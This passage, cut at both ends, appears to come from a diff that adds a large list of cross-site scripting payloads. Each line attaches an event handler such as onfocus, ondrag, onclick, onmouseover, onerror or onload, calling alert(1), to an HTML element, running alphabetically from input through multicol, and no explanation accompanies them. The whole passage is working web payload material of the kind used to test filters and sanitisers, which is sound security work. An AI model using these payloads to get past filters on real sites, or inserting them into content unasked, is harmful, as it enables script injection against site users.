type=radio id=x onfocus=alert(1)> +<input type=radio id=x onfocusin=alert(1)> +<ins draggable="true" ondrag="alert(1)">test</ins> +<ins draggable="true" ondragend="alert(1)">test</ins> +<ins draggable="true" ondragenter="alert(1)">test</ins> +<ins draggable="true" ondragleave="alert(1)">test</ins> +<ins draggable="true" ondragstart="alert(1)">test</ins> +<ins id=x tabindex=1 onactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforeactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input autofocus> +<ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus> +<ins id=x tabindex=1 onfocus=alert(1)></ins> +<ins id=x tabindex=1 onfocusin=alert(1)></ins> +<ins onbeforecopy="alert(1)" contenteditable>test</ins> +<ins onbeforecut="alert(1)" contenteditable>test</ins> +<ins onbeforepaste="alert(1)" contenteditable>test</ins> +<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onclick="alert(1)">test</ins> +<ins oncontextmenu="alert(1)">test</ins> +<ins oncopy="alert(1)" contenteditable>test</ins> +<ins oncut="alert(1)" contenteditable>test</ins> +<ins ondblclick="alert(1)">test</ins> +<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onkeydown="alert(1)" contenteditable>test</ins> +<ins onkeypress="alert(1)" contenteditable>test</ins> +<ins onkeyup="alert(1)" contenteditable>test</ins> +<ins onmousedown="alert(1)">test</ins> +<ins onmouseenter="alert(1)">test</ins> +<ins onmouseleave="alert(1)">test</ins> +<ins onmousemove="alert(1)">test</ins> +<ins onmouseout="alert(1)">test</ins> +<ins onmouseover="alert(1)">test</ins> +<ins onmouseup="alert(1)">test</ins> +<ins onpaste="alert(1)" contenteditable>test</ins> +<isindex draggable="true" ondrag="alert(1)">test</isindex> +<isindex draggable="true" ondragend="alert(1)">test</isindex> +<isindex draggable="true" ondragenter="alert(1)">test</isindex> +<isindex draggable="true" ondragleave="alert(1)">test</isindex> +<isindex draggable="true" ondragstart="alert(1)">test</isindex> +<isindex id=x tabindex=1 onactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus> +<isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus> +<isindex id=x tabindex=1 onfocus=alert(1)></isindex> +<isindex id=x tabindex=1 onfocusin=alert(1)></isindex> +<isindex onbeforecopy="alert(1)" contenteditable>test</isindex> +<isindex onbeforecut="alert(1)" contenteditable>test</isindex> +<isindex onbeforepaste="alert(1)" contenteditable>test</isindex> +<isindex onblur=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onclick="alert(1)">test</isindex> +<isindex oncontextmenu="alert(1)">test</isindex> +<isindex oncopy="alert(1)" contenteditable>test</isindex> +<isindex oncut="alert(1)" contenteditable>test</isindex> +<isindex ondblclick="alert(1)">test</isindex> +<isindex onfocusout=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onkeydown="alert(1)" contenteditable>test</isindex> +<isindex onkeypress="alert(1)" contenteditable>test</isindex> +<isindex onkeyup="alert(1)" contenteditable>test</isindex> +<isindex onmousedown="alert(1)">test</isindex> +<isindex onmouseenter="alert(1)">test</isindex> +<isindex onmouseleave="alert(1)">test</isindex> +<isindex onmousemove="alert(1)">test</isindex> +<isindex onmouseout="alert(1)">test</isindex> +<isindex onmouseover="alert(1)">test</isindex> +<isindex onmouseup="alert(1)">test</isindex> +<isindex onpaste="alert(1)" contenteditable>test</isindex> +<isindex type=image onload=alert(1) src=validimage.png> +<isindex type=image src=1 onerror=alert(1)> +<kbd draggable="true" ondrag="alert(1)">test</kbd> +<kbd draggable="true" ondragend="alert(1)">test</kbd> +<kbd draggable="true" ondragenter="alert(1)">test</kbd> +<kbd draggable="true" ondragleave="alert(1)">test</kbd> +<kbd draggable="true" ondragstart="alert(1)">test</kbd> +<kbd id=x tabindex=1 onactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus> +<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus> +<kbd id=x tabindex=1 onfocus=alert(1)></kbd> +<kbd id=x tabindex=1 onfocusin=alert(1)></kbd> +<kbd onbeforecopy="alert(1)" contenteditable>test</kbd> +<kbd onbeforecut="alert(1)" contenteditable>test</kbd> +<kbd onbeforepaste="alert(1)" contenteditable>test</kbd> +<kbd onblur=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onclick="alert(1)">test</kbd> +<kbd oncontextmenu="alert(1)">test</kbd> +<kbd oncopy="alert(1)" contenteditable>test</kbd> +<kbd oncut="alert(1)" contenteditable>test</kbd> +<kbd ondblclick="alert(1)">test</kbd> +<kbd onfocusout=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onkeydown="alert(1)" contenteditable>test</kbd> +<kbd onkeypress="alert(1)" contenteditable>test</kbd> +<kbd onkeyup="alert(1)" contenteditable>test</kbd> +<kbd onmousedown="alert(1)">test</kbd> +<kbd onmouseenter="alert(1)">test</kbd> +<kbd onmouseleave="alert(1)">test</kbd> +<kbd onmousemove="alert(1)">test</kbd> +<kbd onmouseout="alert(1)">test</kbd> +<kbd onmouseover="alert(1)">test</kbd> +<kbd onmouseup="alert(1)">test</kbd> +<kbd onpaste="alert(1)" contenteditable>test</kbd> +<keygen autofocus onfocus=alert(1)> +<keygen autofocus onfocusin=alert(1)> +<keygen draggable="true" ondrag="alert(1)">test</keygen> +<keygen draggable="true" ondragend="alert(1)">test</keygen> +<keygen draggable="true" ondragenter="alert(1)">test</keygen> +<keygen draggable="true" ondragleave="alert(1)">test</keygen> +<keygen draggable="true" ondragstart="alert(1)">test</keygen> +<keygen id=x onfocus=alert(1)> +<keygen id=x onfocusin=alert(1)> +<keygen id=x tabindex=1 onactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus> +<keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus> +<keygen onbeforecopy="alert(1)" contenteditable>test</keygen> +<keygen onbeforecut="alert(1)" contenteditable>test</keygen> +<keygen onbeforepaste="alert(1)" contenteditable>test</keygen> +<keygen onblur=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onclick="alert(1)">test</keygen> +<keygen oncontextmenu="alert(1)">test</keygen> +<keygen oncopy="alert(1)" contenteditable>test</keygen> +<keygen oncut="alert(1)" contenteditable>test</keygen> +<keygen ondblclick="alert(1)">test</keygen> +<keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onkeydown="alert(1)" contenteditable>test</keygen> +<keygen onkeypress="alert(1)" contenteditable>test</keygen> +<keygen onkeyup="alert(1)" contenteditable>test</keygen> +<keygen onmousedown="alert(1)">test</keygen> +<keygen onmouseenter="alert(1)">test</keygen> +<keygen onmouseleave="alert(1)">test</keygen> +<keygen onmousemove="alert(1)">test</keygen> +<keygen onmouseout="alert(1)">test</keygen> +<keygen onmouseover="alert(1)">test</keygen> +<keygen onmouseup="alert(1)">test</keygen> +<keygen onpaste="alert(1)" contenteditable>test</keygen> +<label draggable="true" ondrag="alert(1)">test</label> +<label draggable="true" ondragend="alert(1)">test</label> +<label draggable="true" ondragenter="alert(1)">test</label> +<label draggable="true" ondragleave="alert(1)">test</label> +<label draggable="true" ondragstart="alert(1)">test</label> +<label id=x tabindex=1 onactivate=alert(1)></label> +<label id=x tabindex=1 onbeforeactivate=alert(1)></label> +<label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus> +<label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus> +<label id=x tabindex=1 onfocus=alert(1)></label> +<label id=x tabindex=1 onfocusin=alert(1)></label> +<label onbeforecopy="alert(1)" contenteditable>test</label> +<label onbeforecut="alert(1)" contenteditable>test</label> +<label onbeforepaste="alert(1)" contenteditable>test</label> +<label onblur=alert(1) tabindex=1 id=x></label><input autofocus> +<label onclick="alert(1)">test</label> +<label oncontextmenu="alert(1)">test</label> +<label oncopy="alert(1)" contenteditable>test</label> +<label oncut="alert(1)" contenteditable>test</label> +<label ondblclick="alert(1)">test</label> +<label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus> +<label onkeydown="alert(1)" contenteditable>test</label> +<label onkeypress="alert(1)" contenteditable>test</label> +<label onkeyup="alert(1)" contenteditable>test</label> +<label onmousedown="alert(1)">test</label> +<label onmouseenter="alert(1)">test</label> +<label onmouseleave="alert(1)">test</label> +<label onmousemove="alert(1)">test</label> +<label onmouseout="alert(1)">test</label> +<label onmouseover="alert(1)">test</label> +<label onmouseup="alert(1)">test</label> +<label onpaste="alert(1)" contenteditable>test</label> +<legend draggable="true" ondrag="alert(1)">test</legend> +<legend draggable="true" ondragend="alert(1)">test</legend> +<legend draggable="true" ondragenter="alert(1)">test</legend> +<legend draggable="true" ondragleave="alert(1)">test</legend> +<legend draggable="true" ondragstart="alert(1)">test</legend> +<legend id=x tabindex=1 onactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus> +<legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus> +<legend id=x tabindex=1 onfocus=alert(1)></legend> +<legend id=x tabindex=1 onfocusin=alert(1)></legend> +<legend onbeforecopy="alert(1)" contenteditable>test</legend> +<legend onbeforecut="alert(1)" contenteditable>test</legend> +<legend onbeforepaste="alert(1)" contenteditable>test</legend> +<legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onclick="alert(1)">test</legend> +<legend oncontextmenu="alert(1)">test</legend> +<legend oncopy="alert(1)" contenteditable>test</legend> +<legend oncut="alert(1)" contenteditable>test</legend> +<legend ondblclick="alert(1)">test</legend> +<legend onfocusout=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onkeydown="alert(1)" contenteditable>test</legend> +<legend onkeypress="alert(1)" contenteditable>test</legend> +<legend onkeyup="alert(1)" contenteditable>test</legend> +<legend onmousedown="alert(1)">test</legend> +<legend onmouseenter="alert(1)">test</legend> +<legend onmouseleave="alert(1)">test</legend> +<legend onmousemove="alert(1)">test</legend> +<legend onmouseout="alert(1)">test</legend> +<legend onmouseover="alert(1)">test</legend> +<legend onmouseup="alert(1)">test</legend> +<legend onpaste="alert(1)" contenteditable>test</legend> +<li draggable="true" ondrag="alert(1)">test</li> +<li draggable="true" ondragend="alert(1)">test</li> +<li draggable="true" ondragenter="alert(1)">test</li> +<li draggable="true" ondragleave="alert(1)">test</li> +<li draggable="true" ondragstart="alert(1)">test</li> +<li id=x tabindex=1 onactivate=alert(1)></li> +<li id=x tabindex=1 onbeforeactivate=alert(1)></li> +<li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus> +<li id=x tabindex=1 ondeactivate=alert(1)></li><input id=y autofocus> +<li id=x tabindex=1 onfocus=alert(1)></li> +<li id=x tabindex=1 onfocusin=alert(1)></li> +<li onbeforecopy="alert(1)" contenteditable>test</li> +<li onbeforecut="alert(1)" contenteditable>test</li> +<li onbeforepaste="alert(1)" contenteditable>test</li> +<li onblur=alert(1) tabindex=1 id=x></li><input autofocus> +<li onclick="alert(1)">test</li> +<li oncontextmenu="alert(1)">test</li> +<li oncopy="alert(1)" contenteditable>test</li> +<li oncut="alert(1)" contenteditable>test</li> +<li ondblclick="alert(1)">test</li> +<li onfocusout=alert(1) tabindex=1 id=x></li><input autofocus> +<li onkeydown="alert(1)" contenteditable>test</li> +<li onkeypress="alert(1)" contenteditable>test</li> +<li onkeyup="alert(1)" contenteditable>test</li> +<li onmousedown="alert(1)">test</li> +<li onmouseenter="alert(1)">test</li> +<li onmouseleave="alert(1)">test</li> +<li onmousemove="alert(1)">test</li> +<li onmouseout="alert(1)">test</li> +<li onmouseover="alert(1)">test</li> +<li onmouseup="alert(1)">test</li> +<li onpaste="alert(1)" contenteditable>test</li> +<link draggable="true" ondrag="alert(1)">test</link> +<link draggable="true" ondragend="alert(1)">test</link> +<link draggable="true" ondragenter="alert(1)">test</link> +<link draggable="true" ondragleave="alert(1)">test</link> +<link draggable="true" ondragstart="alert(1)">test</link> +<link href=validstyles.css rel=stylesheet onload=alert(1)> +<link id=x tabindex=1 onactivate=alert(1)></link> +<link id=x tabindex=1 onbeforeactivate=alert(1)></link> +<link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus> +<link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus> +<link onbeforecopy="alert(1)" contenteditable>test</link> +<link onbeforecut="alert(1)" contenteditable>test</link> +<link onbeforepaste="alert(1)" contenteditable>test</link> +<link onblur=alert(1) tabindex=1 id=x></link><input autofocus> +<link onclick="alert(1)">test</link> +<link oncontextmenu="alert(1)">test</link> +<link oncopy="alert(1)" contenteditable>test</link> +<link oncut="alert(1)" contenteditable>test</link> +<link ondblclick="alert(1)">test</link> +<link onfocus=alert(1) id=x tabindex=1 style=display:block> +<link onfocusin=alert(1) id=x tabindex=1 style=display:block> +<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus> +<link onkeydown="alert(1)" contenteditable>test</link> +<link onkeypress="alert(1)" contenteditable>test</link> +<link onkeyup="alert(1)" contenteditable>test</link> +<link onmousedown="alert(1)">test</link> +<link onmouseenter="alert(1)">test</link> +<link onmouseleave="alert(1)">test</link> +<link onmousemove="alert(1)">test</link> +<link onmouseout="alert(1)">test</link> +<link onmouseover="alert(1)">test</link> +<link onmouseup="alert(1)">test</link> +<link onpaste="alert(1)" contenteditable>test</link> +<link onreadystatechange=alert(1) rel=stylesheet href=1> +<link rel=stylesheet href=1 onerror=alert(1)> +<listing draggable="true" ondrag="alert(1)">test</listing> +<listing draggable="true" ondragend="alert(1)">test</listing> +<listing draggable="true" ondragenter="alert(1)">test</listing> +<listing draggable="true" ondragleave="alert(1)">test</listing> +<listing draggable="true" ondragstart="alert(1)">test</listing> +<listing id=x tabindex=1 onactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforeactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus> +<listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus> +<listing id=x tabindex=1 onfocus=alert(1)></listing> +<listing id=x tabindex=1 onfocusin=alert(1)></listing> +<listing onbeforecopy="alert(1)" contenteditable>test</listing> +<listing onbeforecut="alert(1)" contenteditable>test</listing> +<listing onbeforepaste="alert(1)" contenteditable>test</listing> +<listing onblur=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onclick="alert(1)">test</listing> +<listing oncontextmenu="alert(1)">test</listing> +<listing oncopy="alert(1)" contenteditable>test</listing> +<listing oncut="alert(1)" contenteditable>test</listing> +<listing ondblclick="alert(1)">test</listing> +<listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onkeydown="alert(1)" contenteditable>test</listing> +<listing onkeypress="alert(1)" contenteditable>test</listing> +<listing onkeyup="alert(1)" contenteditable>test</listing> +<listing onmousedown="alert(1)">test</listing> +<listing onmouseenter="alert(1)">test</listing> +<listing onmouseleave="alert(1)">test</listing> +<listing onmousemove="alert(1)">test</listing> +<listing onmouseout="alert(1)">test</listing> +<listing onmouseover="alert(1)">test</listing> +<listing onmouseup="alert(1)">test</listing> +<listing onpaste="alert(1)" contenteditable>test</listing> +<main draggable="true" ondrag="alert(1)">test</main> +<main draggable="true" ondragend="alert(1)">test</main> +<main draggable="true" ondragenter="alert(1)">test</main> +<main draggable="true" ondragleave="alert(1)">test</main> +<main draggable="true" ondragstart="alert(1)">test</main> +<main id=x tabindex=1 onactivate=alert(1)></main> +<main id=x tabindex=1 onbeforeactivate=alert(1)></main> +<main id=x tabindex=1 onbeforedeactivate=alert(1)></main><input autofocus> +<main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus> +<main id=x tabindex=1 onfocus=alert(1)></main> +<main id=x tabindex=1 onfocusin=alert(1)></main> +<main onbeforecopy="alert(1)" contenteditable>test</main> +<main onbeforecut="alert(1)" contenteditable>test</main> +<main onbeforepaste="alert(1)" contenteditable>test</main> +<main onblur=alert(1) tabindex=1 id=x></main><input autofocus> +<main onclick="alert(1)">test</main> +<main oncontextmenu="alert(1)">test</main> +<main oncopy="alert(1)" contenteditable>test</main> +<main oncut="alert(1)" contenteditable>test</main> +<main ondblclick="alert(1)">test</main> +<main onfocusout=alert(1) tabindex=1 id=x></main><input autofocus> +<main onkeydown="alert(1)" contenteditable>test</main> +<main onkeypress="alert(1)" contenteditable>test</main> +<main onkeyup="alert(1)" contenteditable>test</main> +<main onmousedown="alert(1)">test</main> +<main onmouseenter="alert(1)">test</main> +<main onmouseleave="alert(1)">test</main> +<main onmousemove="alert(1)">test</main> +<main onmouseout="alert(1)">test</main> +<main onmouseover="alert(1)">test</main> +<main onmouseup="alert(1)">test</main> +<main onpaste="alert(1)" contenteditable>test</main> +<map draggable="true" ondrag="alert(1)">test</map> +<map draggable="true" ondragend="alert(1)">test</map> +<map draggable="true" ondragenter="alert(1)">test</map> +<map draggable="true" ondragleave="alert(1)">test</map> +<map draggable="true" ondragstart="alert(1)">test</map> +<map id=x tabindex=1 onactivate=alert(1)></map> +<map id=x tabindex=1 onbeforeactivate=alert(1)></map> +<map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus> +<map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus> +<map id=x tabindex=1 onfocus=alert(1)></map> +<map id=x tabindex=1 onfocusin=alert(1)></map> +<map onbeforecopy="alert(1)" contenteditable>test</map> +<map onbeforecut="alert(1)" contenteditable>test</map> +<map onbeforepaste="alert(1)" contenteditable>test</map> +<map onblur=alert(1) tabindex=1 id=x></map><input autofocus> +<map onclick="alert(1)">test</map> +<map oncontextmenu="alert(1)">test</map> +<map oncopy="alert(1)" contenteditable>test</map> +<map oncut="alert(1)" contenteditable>test</map> +<map ondblclick="alert(1)">test</map> +<map onfocusout=alert(1) tabindex=1 id=x></map><input autofocus> +<map onkeydown="alert(1)" contenteditable>test</map> +<map onkeypress="alert(1)" contenteditable>test</map> +<map onkeyup="alert(1)" contenteditable>test</map> +<map onmousedown="alert(1)">test</map> +<map onmouseenter="alert(1)">test</map> +<map onmouseleave="alert(1)">test</map> +<map onmousemove="alert(1)">test</map> +<map onmouseout="alert(1)">test</map> +<map onmouseover="alert(1)">test</map> +<map onmouseup="alert(1)">test</map> +<map onpaste="alert(1)" contenteditable>test</map> +<mark draggable="true" ondrag="alert(1)">test</mark> +<mark draggable="true" ondragend="alert(1)">test</mark> +<mark draggable="true" ondragenter="alert(1)">test</mark> +<mark draggable="true" ondragleave="alert(1)">test</mark> +<mark draggable="true" ondragstart="alert(1)">test</mark> +<mark id=x tabindex=1 onactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforeactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforedeactivate=alert(1)></mark><input autofocus> +<mark id=x tabindex=1 ondeactivate=alert(1)></mark><input id=y autofocus> +<mark id=x tabindex=1 onfocus=alert(1)></mark> +<mark id=x tabindex=1 onfocusin=alert(1)></mark> +<mark onbeforecopy="alert(1)" contenteditable>test</mark> +<mark onbeforecut="alert(1)" contenteditable>test</mark> +<mark onbeforepaste="alert(1)" contenteditable>test</mark> +<mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onclick="alert(1)">test</mark> +<mark oncontextmenu="alert(1)">test</mark> +<mark oncopy="alert(1)" contenteditable>test</mark> +<mark oncut="alert(1)" contenteditable>test</mark> +<mark ondblclick="alert(1)">test</mark> +<mark onfocusout=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onkeydown="alert(1)" contenteditable>test</mark> +<mark onkeypress="alert(1)" contenteditable>test</mark> +<mark onkeyup="alert(1)" contenteditable>test</mark> +<mark onmousedown="alert(1)">test</mark> +<mark onmouseenter="alert(1)">test</mark> +<mark onmouseleave="alert(1)">test</mark> +<mark onmousemove="alert(1)">test</mark> +<mark onmouseout="alert(1)">test</mark> +<mark onmouseover="alert(1)">test</mark> +<mark onmouseup="alert(1)">test</mark> +<mark onpaste="alert(1)" contenteditable>test</mark> +<marquee draggable="true" ondrag="alert(1)">test</marquee> +<marquee draggable="true" ondragend="alert(1)">test</marquee> +<marquee draggable="true" ondragenter="alert(1)">test</marquee> +<marquee draggable="true" ondragleave="alert(1)">test</marquee> +<marquee draggable="true" ondragstart="alert(1)">test</marquee> +<marquee id=x tabindex=1 onactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforedeactivate=alert(1)></marquee><input autofocus> +<marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus> +<marquee id=x tabindex=1 onfocus=alert(1)></marquee> +<marquee id=x tabindex=1 onfocusin=alert(1)></marquee> +<marquee onbeforecopy="alert(1)" contenteditable>test</marquee> +<marquee onbeforecut="alert(1)" contenteditable>test</marquee> +<marquee onbeforepaste="alert(1)" contenteditable>test</marquee> +<marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onclick="alert(1)">test</marquee> +<marquee oncontextmenu="alert(1)">test</marquee> +<marquee oncopy="alert(1)" contenteditable>test</marquee> +<marquee oncut="alert(1)" contenteditable>test</marquee> +<marquee ondblclick="alert(1)">test</marquee> +<marquee onfocusout=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onkeydown="alert(1)" contenteditable>test</marquee> +<marquee onkeypress="alert(1)" contenteditable>test</marquee> +<marquee onkeyup="alert(1)" contenteditable>test</marquee> +<marquee onmousedown="alert(1)">test</marquee> +<marquee onmouseenter="alert(1)">test</marquee> +<marquee onmouseleave="alert(1)">test</marquee> +<marquee onmousemove="alert(1)">test</marquee> +<marquee onmouseout="alert(1)">test</marquee> +<marquee onmouseover="alert(1)">test</marquee> +<marquee onmouseup="alert(1)">test</marquee> +<marquee onpaste="alert(1)" contenteditable>test</marquee> +<marquee onstart=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee> +<menu draggable="true" ondrag="alert(1)">test</menu> +<menu draggable="true" ondragend="alert(1)">test</menu> +<menu draggable="true" ondragenter="alert(1)">test</menu> +<menu draggable="true" ondragleave="alert(1)">test</menu> +<menu draggable="true" ondragstart="alert(1)">test</menu> +<menu id=x tabindex=1 onactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforeactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforedeactivate=alert(1)></menu><input autofocus> +<menu id=x tabindex=1 ondeactivate=alert(1)></menu><input id=y autofocus> +<menu id=x tabindex=1 onfocus=alert(1)></menu> +<menu id=x tabindex=1 onfocusin=alert(1)></menu> +<menu onbeforecopy="alert(1)" contenteditable>test</menu> +<menu onbeforecut="alert(1)" contenteditable>test</menu> +<menu onbeforepaste="alert(1)" contenteditable>test</menu> +<menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onclick="alert(1)">test</menu> +<menu oncontextmenu="alert(1)">test</menu> +<menu oncopy="alert(1)" contenteditable>test</menu> +<menu oncut="alert(1)" contenteditable>test</menu> +<menu ondblclick="alert(1)">test</menu> +<menu onfocusout=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onkeydown="alert(1)" contenteditable>test</menu> +<menu onkeypress="alert(1)" contenteditable>test</menu> +<menu onkeyup="alert(1)" contenteditable>test</menu> +<menu onmousedown="alert(1)">test</menu> +<menu onmouseenter="alert(1)">test</menu> +<menu onmouseleave="alert(1)">test</menu> +<menu onmousemove="alert(1)">test</menu> +<menu onmouseout="alert(1)">test</menu> +<menu onmouseover="alert(1)">test</menu> +<menu onmouseup="alert(1)">test</menu> +<menu onpaste="alert(1)" contenteditable>test</menu> +<menuitem draggable="true" ondrag="alert(1)">test</menuitem> +<menuitem draggable="true" ondragend="alert(1)">test</menuitem> +<menuitem draggable="true" ondragenter="alert(1)">test</menuitem> +<menuitem draggable="true" ondragleave="alert(1)">test</menuitem> +<menuitem draggable="true" ondragstart="alert(1)">test</menuitem> +<menuitem id=x tabindex=1 onactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus> +<menuitem id=x tabindex=1 ondeactivate=alert(1)></menuitem><input id=y autofocus> +<menuitem id=x tabindex=1 onfocus=alert(1)></menuitem> +<menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem> +<menuitem onbeforecopy="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforecut="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforepaste="alert(1)" contenteditable>test</menuitem> +<menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onclick="alert(1)">test</menuitem> +<menuitem oncontextmenu="alert(1)">test</menuitem> +<menuitem oncopy="alert(1)" contenteditable>test</menuitem> +<menuitem oncut="alert(1)" contenteditable>test</menuitem> +<menuitem ondblclick="alert(1)">test</menuitem> +<menuitem onfocusout=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onkeydown="alert(1)" contenteditable>test</menuitem> +<menuitem onkeypress="alert(1)" contenteditable>test</menuitem> +<menuitem onkeyup="alert(1)" contenteditable>test</menuitem> +<menuitem onmousedown="alert(1)">test</menuitem> +<menuitem onmouseenter="alert(1)">test</menuitem> +<menuitem onmouseleave="alert(1)">test</menuitem> +<menuitem onmousemove="alert(1)">test</menuitem> +<menuitem onmouseout="alert(1)">test</menuitem> +<menuitem onmouseover="alert(1)">test</menuitem> +<menuitem onmouseup="alert(1)">test</menuitem> +<menuitem onpaste="alert(1)" contenteditable>test</menuitem> +<meta draggable="true" ondrag="alert(1)">test</meta> +<meta draggable="true" ondragend="alert(1)">test</meta> +<meta draggable="true" ondragenter="alert(1)">test</meta> +<meta draggable="true" ondragleave="alert(1)">test</meta> +<meta draggable="true" ondragstart="alert(1)">test</meta> +<meta id=x tabindex=1 onactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforeactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforedeactivate=alert(1)></meta><input autofocus> +<meta id=x tabindex=1 ondeactivate=alert(1)></meta><input id=y autofocus> +<meta id=x tabindex=1 onfocus=alert(1)></meta> +<meta id=x tabindex=1 onfocusin=alert(1)></meta> +<meta onbeforecopy="alert(1)" contenteditable>test</meta> +<meta onbeforecut="alert(1)" contenteditable>test</meta> +<meta onbeforepaste="alert(1)" contenteditable>test</meta> +<meta onblur=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onclick="alert(1)">test</meta> +<meta oncontextmenu="alert(1)">test</meta> +<meta oncopy="alert(1)" contenteditable>test</meta> +<meta oncut="alert(1)" contenteditable>test</meta> +<meta ondblclick="alert(1)">test</meta> +<meta onfocusout=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onkeydown="alert(1)" contenteditable>test</meta> +<meta onkeypress="alert(1)" contenteditable>test</meta> +<meta onkeyup="alert(1)" contenteditable>test</meta> +<meta onmousedown="alert(1)">test</meta> +<meta onmouseenter="alert(1)">test</meta> +<meta onmouseleave="alert(1)">test</meta> +<meta onmousemove="alert(1)">test</meta> +<meta onmouseout="alert(1)">test</meta> +<meta onmouseover="alert(1)">test</meta> +<meta onmouseup="alert(1)">test</meta> +<meta onpaste="alert(1)" contenteditable>test</meta> +<meter draggable="true" ondrag="alert(1)">test</meter> +<meter draggable="true" ondragend="alert(1)">test</meter> +<meter draggable="true" ondragenter="alert(1)">test</meter> +<meter draggable="true" ondragleave="alert(1)">test</meter> +<meter draggable="true" ondragstart="alert(1)">test</meter> +<meter id=x tabindex=1 onactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforeactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforedeactivate=alert(1)></meter><input autofocus> +<meter id=x tabindex=1 ondeactivate=alert(1)></meter><input id=y autofocus> +<meter id=x tabindex=1 onfocus=alert(1)></meter> +<meter id=x tabindex=1 onfocusin=alert(1)></meter> +<meter onbeforecopy="alert(1)" contenteditable>test</meter> +<meter onbeforecut="alert(1)" contenteditable>test</meter> +<meter onbeforepaste="alert(1)" contenteditable>test</meter> +<meter onblur=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onclick="alert(1)">test</meter> +<meter oncontextmenu="alert(1)">test</meter> +<meter oncopy="alert(1)" contenteditable>test</meter> +<meter oncut="alert(1)" contenteditable>test</meter> +<meter ondblclick="alert(1)">test</meter> +<meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onkeydown="alert(1)" contenteditable>test</meter> +<meter onkeypress="alert(1)" contenteditable>test</meter> +<meter onkeyup="alert(1)" contenteditable>test</meter> +<meter onmousedown="alert(1)">test</meter> +<meter onmouseenter="alert(1)">test</meter> +<meter onmouseleave="alert(1)">test</meter> +<meter onmousemove="alert(1)">test</meter> +<meter onmouseout="alert(1)">test</meter> +<meter onmouseover="alert(1)">test</meter> +<meter onmouseup="alert(1)">test</meter> +<meter onpaste="alert(1)" contenteditable>test</meter> +<multicol draggable="true" ondrag="alert(1)">test</multicol> +<multicol draggable="true" ondragend="alert(1)">test</multicol> +<multicol draggable="true" ondragenter="alert(1)">test</multicol> +<multicol draggable="true" ondragleave="alert(1)">test</multicol> +<multicol draggable="true" ondragstart="alert(1)">test</multicol> +<multicol id=x tabindex=1 